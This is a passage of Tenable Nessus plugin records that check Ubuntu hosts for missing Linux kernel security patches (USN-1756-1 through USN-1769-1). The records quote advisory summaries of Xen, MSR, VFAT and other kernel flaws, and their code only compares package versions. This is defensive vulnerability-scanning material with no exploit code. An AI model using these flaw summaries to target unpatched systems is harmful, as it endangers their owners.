"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-server"], "id": "UBUNTU_USN-1756-1.NASL", "href": "https://www.tenable.com/plugins/nessus/65077", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1756-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65077);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2013-0216\", \"CVE-2013-0217\", \"CVE-2013-0228\", \"CVE-2013-0268\", \"CVE-2013-0311\", \"CVE-2013-0349\", \"CVE-2013-1773\");\n script_bugtraq_id(57743, 57744, 57838, 57940, 58053, 58200);\n script_xref(name:\"USN\", value:\"1756-1\");\n\n script_name(english:\"Ubuntu 11.10 : linux vulnerabilities (USN-1756-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A failure to validate input was discovered in the Linux kernel's Xen\nnetback (network backend) driver. A user in a guest OS may exploit\nthis flaw to cause a denial of service to the guest OS and other guest\ndomains. (CVE-2013-0216)\n\nA memory leak was discovered in the Linux kernel's Xen netback\n(network backend) driver. A user in a guest OS could trigger this flaw\nto cause a denial of service on the system. (CVE-2013-0217)\n\nAndrew Jones discovered a flaw with the xen_iret function in Linux\nkernel's Xen virtualizeation. In the 32-bit Xen paravirt platform an\nunprivileged guest OS user could exploit this flaw to cause a denial\nof service (crash the system) or gain guest OS privilege.\n(CVE-2013-0228)\n\nA flaw was reported in the permission checks done by the Linux kernel\nfor /dev/cpu/*/msr. A local root user with all capabilities dropped\ncould exploit this flaw to execute code with full root capabilities.\n(CVE-2013-0268)\n\nA flaw was discovered in the Linux kernel's vhost driver used to\naccelerate guest networking in KVM based virtual machines. A\nprivileged guest user could exploit this flaw to crash the host\nsystem. (CVE-2013-0311)\n\nAn information leak was discovered in the Linux kernel's Bluetooth\nstack when HIDP (Human Interface Device Protocol) support is enabled.\nA local unprivileged user could exploit this flaw to cause an\ninformation leak from the kernel. (CVE-2013-0349)\n\nA flaw was discovered on the Linux kernel's VFAT filesystem driver\nwhen a disk is mounted with the utf8 option (this is the default on\nUbuntu). On a system where disks/images can be auto-mounted or a FAT\nfilesystem is mounted an unprivileged user can exploit the flaw to\ngain root privileges. (CVE-2013-1773).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1756-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:H/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 11.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-0216\", \"CVE-2013-0217\", \"CVE-2013-0228\", \"CVE-2013-0268\", \"CVE-2013-0311\", \"CVE-2013-0349\", \"CVE-2013-1773\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1756-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"11.10\", pkgname:\"linux-image-3.0.0-32-generic\", pkgver:\"3.0.0-32.50\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"linux-image-3.0.0-32-generic-pae\", pkgver:\"3.0.0-32.50\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"linux-image-3.0.0-32-server\", pkgver:\"3.0.0-32.50\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"linux-image-3.0.0-32-virtual\", pkgver:\"3.0.0-32.50\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.0-generic / linux-image-3.0-generic-pae / etc\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:A/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:39:19", "description": "Andrew Cooper of Citrix reported a Xen stack corruption in the Linux\nkernel. An unprivileged user in a 32bit PVOPS guest can cause the\nguest kernel to crash, or operate erroneously. (CVE-2013-0190)\n\nA failure to validate input was discovered in the Linux kernel's Xen\nnetback (network backend) driver. A user in a guest OS may exploit\nthis flaw to cause a denial of service to the guest OS and other guest\ndomains. (CVE-2013-0216)\n\nA memory leak was discovered in the Linux kernel's Xen netback\n(network backend) driver. A user in a guest OS could trigger this flaw\nto cause a denial of service on the system. (CVE-2013-0217)\n\nAndrew Jones discovered a flaw with the xen_iret function in Linux\nkernel's Xen virtualizeation. In the 32-bit Xen paravirt platform an\nunprivileged guest OS user could exploit this flaw to cause a denial\nof service (crash the system) or gain guest OS privilege.\n(CVE-2013-0228)\n\nA flaw was discovered in the Linux kernel Xen PCI backend driver. If a\nPCI device is assigned to the guest OS, the guest OS could exploit\nthis flaw to cause a denial of service on the host. (CVE-2013-0231)\n\nA flaw was reported in the permission checks done by the Linux kernel\nfor /dev/cpu/*/msr. A local root user with all capabilities dropped\ncould exploit this flaw to execute code with full root capabilities.\n(CVE-2013-0268)\n\nA flaw was discovered in the Linux kernel's vhost driver used to\naccelerate guest networking in KVM based virtual machines. A\nprivileged guest user could exploit this flaw to crash the host\nsystem. (CVE-2013-0311)\n\nA flaw was discovered in the Extended Verification Module (EVM) of the\nLinux kernel. An unprivileged local user code exploit this flaw to\ncause a denial of service (system crash). (CVE-2013-0313)\n\nAn information leak was discovered in the Linux kernel's Bluetooth\nstack when HIDP (Human Interface Device Protocol) support is enabled.\nA local unprivileged user could exploit this flaw to cause an\ninformation leak from the kernel. (CVE-2013-0349)\n\nA flaw was discovered in the Edgeort USB serial converter driver when\nthe device is disconnected while it is in use. A local user could\nexploit this flaw to cause a denial of service (system crash).\n(CVE-2013-1774).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2013-03-19T00:00:00", "title": "Ubuntu 12.04 LTS : linux vulnerabilities (USN-1767-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0228", "CVE-2013-0190", "CVE-2013-0268", "CVE-2013-0217", "CVE-2013-0349", "CVE-2013-1774", "CVE-2013-0311", "CVE-2013-0231", "CVE-2013-0313", "CVE-2013-0216"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-1767-1.NASL", "href": "https://www.tenable.com/plugins/nessus/65609", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1767-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65609);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2013-0190\", \"CVE-2013-0216\", \"CVE-2013-0217\", \"CVE-2013-0228\", \"CVE-2013-0231\", \"CVE-2013-0268\", \"CVE-2013-0311\", \"CVE-2013-0313\", \"CVE-2013-0349\", \"CVE-2013-1774\");\n script_xref(name:\"USN\", value:\"1767-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux vulnerabilities (USN-1767-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Andrew Cooper of Citrix reported a Xen stack corruption in the Linux\nkernel. An unprivileged user in a 32bit PVOPS guest can cause the\nguest kernel to crash, or operate erroneously. (CVE-2013-0190)\n\nA failure to validate input was discovered in the Linux kernel's Xen\nnetback (network backend) driver. A user in a guest OS may exploit\nthis flaw to cause a denial of service to the guest OS and other guest\ndomains. (CVE-2013-0216)\n\nA memory leak was discovered in the Linux kernel's Xen netback\n(network backend) driver. A user in a guest OS could trigger this flaw\nto cause a denial of service on the system. (CVE-2013-0217)\n\nAndrew Jones discovered a flaw with the xen_iret function in Linux\nkernel's Xen virtualizeation. In the 32-bit Xen paravirt platform an\nunprivileged guest OS user could exploit this flaw to cause a denial\nof service (crash the system) or gain guest OS privilege.\n(CVE-2013-0228)\n\nA flaw was discovered in the Linux kernel Xen PCI backend driver. If a\nPCI device is assigned to the guest OS, the guest OS could exploit\nthis flaw to cause a denial of service on the host. (CVE-2013-0231)\n\nA flaw was reported in the permission checks done by the Linux kernel\nfor /dev/cpu/*/msr. A local root user with all capabilities dropped\ncould exploit this flaw to execute code with full root capabilities.\n(CVE-2013-0268)\n\nA flaw was discovered in the Linux kernel's vhost driver used to\naccelerate guest networking in KVM based virtual machines. A\nprivileged guest user could exploit this flaw to crash the host\nsystem. (CVE-2013-0311)\n\nA flaw was discovered in the Extended Verification Module (EVM) of the\nLinux kernel. An unprivileged local user code exploit this flaw to\ncause a denial of service (system crash). (CVE-2013-0313)\n\nAn information leak was discovered in the Linux kernel's Bluetooth\nstack when HIDP (Human Interface Device Protocol) support is enabled.\nA local unprivileged user could exploit this flaw to cause an\ninformation leak from the kernel. (CVE-2013-0349)\n\nA flaw was discovered in the Edgeort USB serial converter driver when\nthe device is disconnected while it is in use. A local user could\nexploit this flaw to cause a denial of service (system crash).\n(CVE-2013-1774).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1767-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:H/Au:S/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-0190\", \"CVE-2013-0216\", \"CVE-2013-0217\", \"CVE-2013-0228\", \"CVE-2013-0231\", \"CVE-2013-0268\", \"CVE-2013-0311\", \"CVE-2013-0313\", \"CVE-2013-0349\", \"CVE-2013-1774\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1767-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-39-generic\", pkgver:\"3.2.0-39.62\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-39-generic-pae\", pkgver:\"3.2.0-39.62\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-39-highbank\", pkgver:\"3.2.0-39.62\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-39-virtual\", pkgver:\"3.2.0-39.62\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.2-generic / linux-image-3.2-generic-pae / etc\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:A/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:39:20", "description": "Andrew Cooper of Citrix reported a Xen stack corruption in the Linux\nkernel. An unprivileged user in a 32bit PVOPS guest can cause the\nguest kernel to crash, or operate erroneously. (CVE-2013-0190)\n\nA failure to validate input was discovered in the Linux kernel's Xen\nnetback (network backend) driver. A user in a guest OS may exploit\nthis flaw to cause a denial of service to the guest OS and other guest\ndomains. (CVE-2013-0216)\n\nA memory leak was discovered in the Linux kernel's Xen netback\n(network backend) driver. A user in a guest OS could trigger this flaw\nto cause a denial of service on the system. (CVE-2013-0217)\n\nA flaw was discovered in the Linux kernel Xen PCI backend driver. If a\nPCI device is assigned to the guest OS, the guest OS could exploit\nthis flaw to cause a denial of service on the host. (CVE-2013-0231)\n\nA flaw was reported in the permission checks done by the Linux kernel\nfor /dev/cpu/*/msr. A local root user with all capabilities dropped\ncould exploit this flaw to execute code with full root capabilities.\n(CVE-2013-0268)\n\nTommi Rantala discovered a flaw in the a flaw the Linux kernels\nhandling of datagrams packets when the MSG_PEEK flag is specified. An\nunprivileged local user could exploit this flaw to cause a denial of\nservice (system hang). (CVE-2013-0290)\n\nA flaw was discovered in the Linux kernel's vhost driver used to\naccelerate guest networking in KVM based virtual machines. A\nprivileged guest user could exploit this flaw to crash the host\nsystem. (CVE-2013-0311)\n\nA flaw was discovered in the Extended Verification Module (EVM) of the\nLinux kernel. An unprivileged local user code exploit this flaw to\ncause a denial of service (system crash). (CVE-2013-0313)\n\nAn information leak was discovered in the Linux kernel's Bluetooth\nstack when HIDP (Human Interface Device Protocol) support is enabled.\nA local unprivileged user could exploit this flaw to cause an\ninformation leak from the kernel. (CVE-2013-0349).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2013-03-19T00:00:00", "title": "Ubuntu 12.04 LTS : linux-lts-quantal vulnerabilities (USN-1768-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0190", "CVE-2013-0268", "CVE-2013-0217", "CVE-2013-0349", "CVE-2013-0311", "CVE-2013-0231", "CVE-2013-0313", "CVE-2013-0290", "CVE-2013-0216"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-1768-1.NASL", "href": "https://www.tenable.com/plugins/nessus/65610", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1768-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65610);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2013-0190\", \"CVE-2013-0216\", \"CVE-2013-0217\", \"CVE-2013-0231\", \"CVE-2013-0268\", \"CVE-2013-0290\", \"CVE-2013-0311\", \"CVE-2013-0313\", \"CVE-2013-0349\");\n script_xref(name:\"USN\", value:\"1768-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-quantal vulnerabilities (USN-1768-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Andrew Cooper of Citrix reported a Xen stack corruption in the Linux\nkernel. An unprivileged user in a 32bit PVOPS guest can cause the\nguest kernel to crash, or operate erroneously. (CVE-2013-0190)\n\nA failure to validate input was discovered in the Linux kernel's Xen\nnetback (network backend) driver. A user in a guest OS may exploit\nthis flaw to cause a denial of service to the guest OS and other guest\ndomains. (CVE-2013-0216)\n\nA memory leak was discovered in the Linux kernel's Xen netback\n(network backend) driver. A user in a guest OS could trigger this flaw\nto cause a denial of service on the system. (CVE-2013-0217)\n\nA flaw was discovered in the Linux kernel Xen PCI backend driver. If a\nPCI device is assigned to the guest OS, the guest OS could exploit\nthis flaw to cause a denial of service on the host. (CVE-2013-0231)\n\nA flaw was reported in the permission checks done by the Linux kernel\nfor /dev/cpu/*/msr. A local root user with all capabilities dropped\ncould exploit this flaw to execute code with full root capabilities.\n(CVE-2013-0268)\n\nTommi Rantala discovered a flaw in the a flaw the Linux kernels\nhandling of datagrams packets when the MSG_PEEK flag is specified. An\nunprivileged local user could exploit this flaw to cause a denial of\nservice (system hang). (CVE-2013-0290)\n\nA flaw was discovered in the Linux kernel's vhost driver used to\naccelerate guest networking in KVM based virtual machines. A\nprivileged guest user could exploit this flaw to crash the host\nsystem. (CVE-2013-0311)\n\nA flaw was discovered in the Extended Verification Module (EVM) of the\nLinux kernel. An unprivileged local user code exploit this flaw to\ncause a denial of service (system crash). (CVE-2013-0313)\n\nAn information leak was discovered in the Linux kernel's Bluetooth\nstack when HIDP (Human Interface Device Protocol) support is enabled.\nA local unprivileged user could exploit this flaw to cause an\ninformation leak from the kernel. (CVE-2013-0349).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1768-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-3.5-generic package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:H/Au:S/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-0190\", \"CVE-2013-0216\", \"CVE-2013-0217\", \"CVE-2013-0231\", \"CVE-2013-0268\", \"CVE-2013-0290\", \"CVE-2013-0311\", \"CVE-2013-0313\", \"CVE-2013-0349\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1768-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.5.0-26-generic\", pkgver:\"3.5.0-26.42~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.5-generic\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:A/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:39:20", "description": "Andrew Cooper of Citrix reported a Xen stack corruption in the Linux\nkernel. An unprivileged user in a 32bit PVOPS guest can cause the\nguest kernel to crash, or operate erroneously. (CVE-2013-0190)\n\nA failure to validate input was discovered in the Linux kernel's Xen\nnetback (network backend) driver. A user in a guest OS may exploit\nthis flaw to cause a denial of service to the guest OS and other guest\ndomains. (CVE-2013-0216)\n\nA memory leak was discovered in the Linux kernel's Xen netback\n(network backend) driver. A user in a guest OS could trigger this flaw\nto cause a denial of service on the system. (CVE-2013-0217)\n\nA flaw was discovered in the Linux kernel Xen PCI backend driver. If a\nPCI device is assigned to the guest OS, the guest OS could exploit\nthis flaw to cause a denial of service on the host. (CVE-2013-0231)\n\nA flaw was reported in the permission checks done by the Linux kernel\nfor /dev/cpu/*/msr. A local root user with all capabilities dropped\ncould exploit this flaw to execute code with full root capabilities.\n(CVE-2013-0268)\n\nTommi Rantala discovered a flaw in the a flaw the Linux kernels\nhandling of datagrams packets when the MSG_PEEK flag is specified. An\nunprivileged local user could exploit this flaw to cause a denial of\nservice (system hang). (CVE-2013-0290)\n\nA flaw was discovered in the Linux kernel's vhost driver used to\naccelerate guest networking in KVM based virtual machines. A\nprivileged guest user could exploit this flaw to crash the host\nsystem. (CVE-2013-0311)\n\nA flaw was discovered in the Extended Verification Module (EVM) of the\nLinux kernel. An unprivileged local user code exploit this flaw to\ncause a denial of service (system crash). (CVE-2013-0313)\n\nAn information leak was discovered in the Linux kernel's Bluetooth\nstack when HIDP (Human Interface Device Protocol) support is enabled.\nA local unprivileged user could exploit this flaw to cause an\ninformation leak from the kernel. (CVE-2013-0349).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2013-03-19T00:00:00", "title": "Ubuntu 12.10 : linux vulnerabilities (USN-1769-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0190", "CVE-2013-0268", "CVE-2013-0217", "CVE-2013-0349", "CVE-2013-0311", "CVE-2013-0231", "CVE-2013-0313", "CVE-2013-0290", "CVE-2013-0216"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-highbank", "cpe:/o:canonical:ubuntu_linux:12.10", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic"], "id": "UBUNTU_USN-1769-1.NASL", "href": "https://www.tenable.com/plugins/nessus/65611", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1769-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65611);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n 